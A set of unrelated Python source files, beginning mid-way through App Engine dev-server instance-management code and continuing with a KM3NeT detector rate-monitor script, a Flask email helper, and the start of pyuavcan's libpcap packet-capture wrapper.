return _THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.VersionAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
# Just force instances to stop for a faster restart.
for inst in instances_to_stop:
inst.quit(force=True)
start_futures = [
self._async_start_instance(wsgi_servr, inst)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start)]
logging.info('Waiting for instances to restart')
health_check_config = self.module_configuration.vm_health_check
for (inst, wsgi_servr) in zip(instances_to_start, wsgi_servers):
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
_, not_done = futures.wait(start_futures, timeout=_SHUTDOWN_TIMEOUT)
if not_done:
logging.warning('All instances may not have restarted')
else:
logging.info('Instances restarted')
def _restart_instance(self, inst):
"""Restarts the specified instance."""
with self._instances_change_lock:
# Quit the old instance.
inst.quit(force=True)
# Create the new instance.
new_instance = self._instance_factory.new_instance(inst.instance_id)
wsgi_servr = self._wsgi_servers[inst.instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
# Start the new instance.
self._start_instance(wsgi_servr, new_instance)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(new_instance, wsgi_servr, health_check_config)
# Replace it in the module registry.
with self._instances_change_lock:
with self._condition:
self._instances[new_instance.instance_id] = new_instance
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in range(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
return _THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
hrv.py
|
#!/usr/bin/env python
# vim: ts=4 sw=4 et
"""
===========
HRV Monitor
===========
The following script checks the high-rate-veto for each PMT.
"""
# Author: Tamas Gal <tgal@km3net.de>
# License: MIT
from datetime import datetime
import io
from collections import defaultdict
import threading
import time
import km3pipe as kp
from km3pipe.io.daq import TMCHData
import numpy as np
import matplotlib
matplotlib.use("Agg") # noqa
import matplotlib.pyplot as plt
import km3pipe.style as kpst
kpst.use("km3pipe")
__author__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
VERSION = "1.0"
log = kp.logger.get_logger("HRV")
class PMTRates(kp.Module):
def configure(self):
self.detector = self.require("detector")
self.du = self.require("du")
self.interval = self.get("interval") or 10
self.plot_path = self.get("plot_path") or "km3web/plots/hrv.png"
self.max_x = 800
self.index = 0
self.hrv = defaultdict(list)
self.hrv_matrix = np.full((18 * 31, self.max_x), np.nan)
self.lock = threading.Lock()
self.thread = threading.Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
def run(self):
interval = self.interval
while True:
time.sleep(interval)
now = datetime.now()
self.add_column()
self.update_plot()
with self.lock:
self.hrv = defaultdict(list)
delta_t = (datetime.now() - now).total_seconds()
remaining_t = self.interval - delta_t
print(
"Delta t: {} -> waiting for {}s".format(
delta_t, self.interval - delta_t
)
)
if remaining_t < 0:
log.error(
"Can't keep up with plot production. " "Increase the interval!"
)
interval = 1
else:
interval = remaining_t
def add_column(self):
m = np.roll(self.hrv_matrix, -1, 1)
y_range = 18 * 31
mean_hrv = np.full(y_range, np.nan)
for i in range(y_range):
if i not in self.hrv:
continue
mean_hrv[i] = np.mean(self.hrv[i])
m[:, self.max_x - 1] = mean_hrv
self.hrv_matrix = m
print(self.hrv_matrix)
def update_plot(self):
print("Updating plot at {}".format(self.plot_path))
now = time.time()
max_x = self.max_x
interval = self.interval
def xlabel_func(timestamp):
return datetime.utcfromtimestamp(timestamp).strftime("%H:%M")
m = self.hrv_matrix
fig, ax = plt.subplots(figsize=(10, 6))
ax.imshow(m, origin="lower")
ax.set_title("HRV Ratios for DU-{}\n{}".format(self.du, datetime.utcnow()))
ax.set_xlabel("UTC time [{}s/px]".format(interval))
plt.yticks(
[i * 31 for i in range(18)], ["Floor {}".format(f) for f in range(1, 19)]
)
xtics_int = range(0, max_x, int(max_x / 10))
plt.xticks(
[i for i in xtics_int],
[xlabel_func(now - (max_x - i) * interval) for i in xtics_int],
)
fig.tight_layout()
plt.savefig(self.plot_path)
plt.close("all")
def process(self, blob):
tmch_data = TMCHData(io.BytesIO(blob["CHData"]))
dom_id = tmch_data.dom_id
if dom_id not in self.detector.doms:
return blob
du, floor, _ = self.detector.doms[dom_id]
if du != self.du:
return blob
hrv_flags = reversed("{0:b}".format(tmch_data.hrvbmp).zfill(32))
y_base = (floor - 1) * 31
for channel_id, hrv_flag in enumerate(hrv_flags):
idx = y_base + channel_id
with self.lock:
self.hrv[idx].append(int(hrv_flag))
return blob
def main():
detector = kp.hardware.Detector(det_id=29)
pipe = kp.Pipeline(timeit=True)
pipe.attach(
kp.io.CHPump,
host="192.168.0.110",
port=5553,
tags="IO_MONIT",
timeout=60 * 60 * 24 * 7,
max_queue=1000,
)
pipe.attach(PMTRates, detector=detector, du=2, interval=10)
pipe.drain()
if __name__ == "__main__":
main()
|
mails.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from ablog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['ABLOG_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
|
_link_layer.py
|
# Copyright (c) 2020 UAVCAN Consortium
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel@uavcan.org>
from __future__ import annotations
import sys
import time
import typing
import ctypes
import socket
import logging
import threading
import dataclasses
import pyuavcan
from pyuavcan.transport import Timestamp
_logger = logging.getLogger(__name__)
class LinkLayerError(pyuavcan.transport.TransportError):
pass
class LinkLayerCaptureError(LinkLayerError):
pass
@dataclasses.dataclass(frozen=True)
class LinkLayerPacket:
"""
The addresses are represented here in the link-native byte order.
"""
protocol: socket.AddressFamily
"""
The protocol encapsulated inside the link-layer packet; e.g., IPv6.
"""
source: memoryview
destination: memoryview
"""
Link-layer addresses, if applicable. If not supported by the link layer, they are to be empty.
"""
payload: memoryview
"""
The packet of the specified protocol.
"""
def __repr__(self) -> str:
"""
The repr displays only the first 100 bytes of the payload.
If the payload is longer, its string representation is appended with an ellipsis.
"""
limit = 100
if len(self.payload) <= limit:
pld = bytes(self.payload).hex()
else:
pld = bytes(self.payload[:limit]).hex() + "..."
return pyuavcan.util.repr_attributes(
self,
protocol=str(self.protocol),
source=bytes(self.source).hex(),
destination=bytes(self.destination).hex(),
payload=pld,
)
Encoder = typing.Callable[["LinkLayerPacket"], typing.Optional[memoryview]]
Decoder = typing.Callable[[memoryview], typing.Optional["LinkLayerPacket"]]
@staticmethod
def get_codecs() -> typing.Dict[int, typing.Tuple[Encoder, Decoder]]:
"""
A factory of paired encode/decode functions that are used for building and parsing link-layer packets.
The pairs are organized into a dict where the key is the data link type code from libpcap;
see https://www.tcpdump.org/linktypes.html.
The dict is ordered such that the recommended data link types come first.
This is useful when setting up packet capture if the adapter supports multiple link layer formats.
The encoder returns None if the encapsulated protocol is not supported by the selected link layer.
The decoder returns None if the packet is not valid or the encapsulated protocol is not supported.
"""
import libpcap as pcap # type: ignore
from socket import AddressFamily
def get_ethernet() -> typing.Tuple[LinkLayerPacket.Encoder, LinkLayerPacket.Decoder]:
# https://en.wikipedia.org/wiki/EtherType
af_to_ethertype = {
AddressFamily.AF_INET: 0x0800,
AddressFamily.AF_INET6: 0x86DD,
}
ethertype_to_af = {v: k for k, v in af_to_ethertype.items()}
def enc(p: LinkLayerPacket) -> typing.Optional[memoryview]:
try:
return memoryview(
b"".join(
(
bytes(p.source).rjust(6, b"\x00")[:6],
bytes(p.destination).rjust(6, b"\x00")[:6],
af_to_ethertype[p.protocol].to_bytes(2, "big"),
p.payload,
)
)
)
except LookupError:
return None
def dec(p: memoryview) -> typing.Optional[LinkLayerPacket]:
if len(p) < 14:
return None
src = p[0:6]
dst = p[6:12]
ethertype = int.from_bytes(p[12:14], "big")
try:
protocol = ethertype_to_af[ethertype]
except LookupError:
return None
return LinkLayerPacket(protocol=protocol, source=src, destination=dst, payload=p[14:])
return enc, dec
def get_loopback(byte_order: str) -> typing.Tuple[LinkLayerPacket.Encoder, LinkLayerPacket.Decoder]:
# DLT_NULL is used by the Windows loopback interface. Info: https://wiki.wireshark.org/NullLoopback
# The source and destination addresses are not representable in this data link layer.
def enc(p: LinkLayerPacket) -> typing.Optional[memoryview]:
return memoryview(b"".join((p.protocol.to_bytes(4, byte_order), p.payload)))
def dec(p: memoryview) -> typing.Optional[LinkLayerPacket]:
if len(p) < 4:
return None
try:
protocol = AddressFamily(int.from_bytes(p[0:4], byte_order))
except ValueError:
return None
empty = memoryview(b"")
return LinkLayerPacket(protocol=protocol, source=empty, destination=empty, payload=p[4:])
return enc, dec
# The output is ORDERED, best option first.
return {
pcap.DLT_EN10MB: get_ethernet(),
pcap.DLT_LOOP: get_loopback("big"),
pcap.DLT_NULL: get_loopback(sys.byteorder),
}
@dataclasses.dataclass(frozen=True)
class LinkLayerCapture:
timestamp: Timestamp
packet: LinkLayerPacket
device_name: str
# Do we also need to report the link layer type here?
class LinkLayerSniffer:
"""
This wrapper is intended to insulate the rest of the transport implementation from the specifics of the
libpcap wrapper implementation (there are dozens of different wrappers out there).
Observe that anything libpcap-related shall not be imported outside of these methods because we only require
this dependency if protocol sniffing capability is needed.
Regular use of the library should be possible without libpcap installed.
Once a new instance is constructed, it is launched immediately.
Execution is carried out in a background daemon thread pool.
It is required to call :meth:`close` when done, which will hint the worker threads to terminate soon.
If a new network device is added or re-initialized while the sniffer is running, it will not be recognized.
Removal or a re-configuration of a device while the sniffer is running may cause it to fail,
which will be logged from the worker threads.
Should a worker thread encounter an error (e.g., if the device becomes unavailable), its capture context
is closed automatically and then the thread is terminated.
Such occurrences are logged at the CRITICAL severity level.
- https://www.tcpdump.org/manpages/pcap.3pcap.html
- https://github.com/karpierz/libpcap/blob/master/tests/capturetest.py
"""
def __init__(self, filter_expression: str, callback: typing.Callable[[LinkLayerCapture], None]) -> None:
"""
:param filter_expression: The standard pcap filter expression;
see https://www.tcpdump.org/manpages/pcap-filter.7.html.
Use Wireshark for testing filter expressions.
:param callback: This callback will be invoked once whenever a packet is captured with a single argument
of type :class:`LinkLayerCapture`.
Notice an important detail: the sniffer takes care of managing the link layer packets.
The user does not need to care which type of data link layer encapsulation is used:
it could be Ethernet, IEEE 802.15.4, or whatever.
The application always gets a high-level view of the data with the link-layer specifics abstracted away.
This function may be invoked directly from a worker thread, so be sure to apply synchronization.
"""
self._filter_expr = str(filter_expression)
self._callback = callback
self._keep_going = True
self._workers: typing.List[threading.Thread] = []
try:
dev_names = _find_devices()
_logger.debug("Capturable network devices: %s", dev_names)
caps = _capture_all(dev_names, filter_expression)
except PermissionError:
if sys.platform.startswith("linux"):
suggestion = f'Run this:\nsudo setcap cap_net_raw+eip "$(readlink -f {sys.executable})"'
elif sys.platform.startswith("win"):
suggestion = "Make sure you have Npcap installed and configured properly: https://nmap.org/npcap"
else:
suggestion = ""
raise PermissionError(
f"You need special privileges to perform low-level network packet capture (sniffing). {suggestion}"
) from None
if not caps:
raise LinkLayerCaptureError(
f"There are no devices available for packet capture at the moment. Evaluated candidates: {dev_names}"
)
self._workers = [
threading.Thread(target=self._thread_worker, name=f"pcap_{name}", args=(name, pd, decoder), daemon=True)
for name, pd, decoder in caps
]
for w in self._workers:
w.start()
assert len(self._workers) > 0
@property
